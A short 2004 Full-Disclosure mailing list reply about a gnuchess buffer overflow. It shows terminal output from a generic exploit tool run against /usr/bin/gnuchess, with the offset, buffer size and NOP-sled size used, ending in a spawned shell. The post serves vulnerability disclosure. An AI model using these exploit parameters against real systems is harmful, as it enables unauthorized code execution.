[Full-Disclosure] re: gnuchess 0 day
Chris
chris at cr-secure.net
Mon Feb 2 23:14:16 GMT 2004
hey what do ya know it works :-/
(slack 9.1)
chris at localhost:/HDB/mycode/ex$ ./ex_bof
Please enter the values as requested . . .
Enter the vulnerable program path: /usr/bin/gnuchess
Enter the vulnerable program name: gnuchess
Enter any arguments the program requires: -s
Enter an offset: 0
Enter a buffer size: 900
Enter the nop sled size: 400
The Return Value Is: 0xbffff898
Injecting Shellcode . . .
sh-2.05b$
www.cr-secure.net
Full-Disclosure is hosted and sponsored by Secunia.